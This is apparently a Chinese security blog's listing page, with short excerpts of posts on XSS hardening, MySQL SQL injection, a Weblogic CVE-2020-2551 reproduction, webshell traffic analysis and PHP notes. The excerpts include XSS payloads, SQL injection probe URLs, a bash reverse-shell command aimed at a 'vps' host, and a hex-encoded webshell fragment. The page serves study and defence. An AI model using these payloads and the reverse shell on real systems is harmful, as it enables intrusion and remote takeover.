原创 常見web攻擊的加固方法

0x01 XSS 1.過濾特殊字符(XSS Filter) 過濾惡意標籤+屬性 (1)href僞協議 <a href=javascript:('/a/')>test</a> (2)HTML新增標籤 <math><maction

原创 python寫個簡單的poc

import requests import argparse Request頭: header={ 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit

原创 常見端口&漏洞

遠程連接端口 端口號 端口說明 使用說明 22 SSH遠程連接 爆破、SSH隧道及內網代理轉發、文件傳輸 23 Telnet遠程連接 爆破、嗅探、弱口令 3389 RDP遠程桌面連接 爆破、遠程命令執行

原创 針對MySQL的sql注入

常用: //order by和union select後接的數字個數如果和當前表的列數不同會報錯。故可通過以下語句對列數進行判定。 http://xxx.com/index.php?id=1 order by 3 //判斷哪一

原创 Weblogic RMI-IIOP(cve-2020-2551)復現

0x01 復現 RMI方式: 1.vps 生成exp.class(示例爲windows彈計算器,如果想反彈linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然後vps用nc

原创 去除/添加服務器響應頭的信息

0x01 去掉響應頭的信息 針對通過響應頭判斷服務器版本和語言版本的信息泄露漏洞,如何去防護 1.1 php 隱藏 X-Power-By PHP 設置php.ini expose_php = Off 1.2 隱藏server信息

原创 冰蠍PHP碼流量還原

0x01前言 之前打3ctf的時候看見了一道冰蠍流量還原的misc,之後覺得還挺有意思的,畢竟之前網站被種過馬 ,弄出來之後搞個工具結合全流量設備或者wireshark的包來還原攻擊者到底做了哪些動作,故有了此文。 0x02環境準

原创 PHP day 03

0x14 文件處理 1.打開文件 resource fopen ( string filename, string mode [, bool use_include_path]); #filename是要打開的包含路徑的文件名,可

原创 PHP day 02

0x08 正則表達式 1.行定位符 ^ 開始 $ 結尾 2.單詞定界符 \b 查找一個完整的單詞 \B 與\b相反 3.字符類 [] 單字符匹配 4.選擇字符 | 5.連字符 - [a-zA-Z] 6.排

原创 PHP day 01

0x01 標記風格 1.腳本風格: <script language="php"> echo '這是腳本風格的標記'; </script> 2.簡短風格: <? echo '這是簡短風格的標記'; ?> 3.ASP風格: <%

原创 針對mysql的sql注入

//判斷order by後面的個數 http://xxx.com/index.php?id=1 order by 3 //判斷哪一個可回顯 http://xxx.com/index.php?id=-1 union sel<>ect

原创 python——pandas

一些很雜的筆記和實現的功能 #_*_ coding:utf-8 _*_ import numpy as np import pandas as pd ''' #Note #獲取en.csv中的信息 df = pd.DataFrame

原创 Kindeditor 4.1.x

在github上找了Kindeditor某一版本的源代碼。 目錄如下: 目錄遍歷,出現403代表有,404代表沒有。 xxx.com/kindeditor下的文件名: /asp/demo.asp /asp/file_manager_

原创 工具使用——Burp與FoxyProxy Standard配置

配置過程中曾經遇到過的問題,記錄一下。配置完成後即可一鍵切換,不用再進入瀏覽器的設置中再調。 ①打開FoxyProxy Standard,新建代理服務器 ②將主機或IP地址填寫爲burp代理中的地址即可。 PS: 1.可能會遇到已

原创 常用編碼

I.ASCII編碼 示例:(hex轉ascii) 28 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 7a 30 5d 29 29 3b 26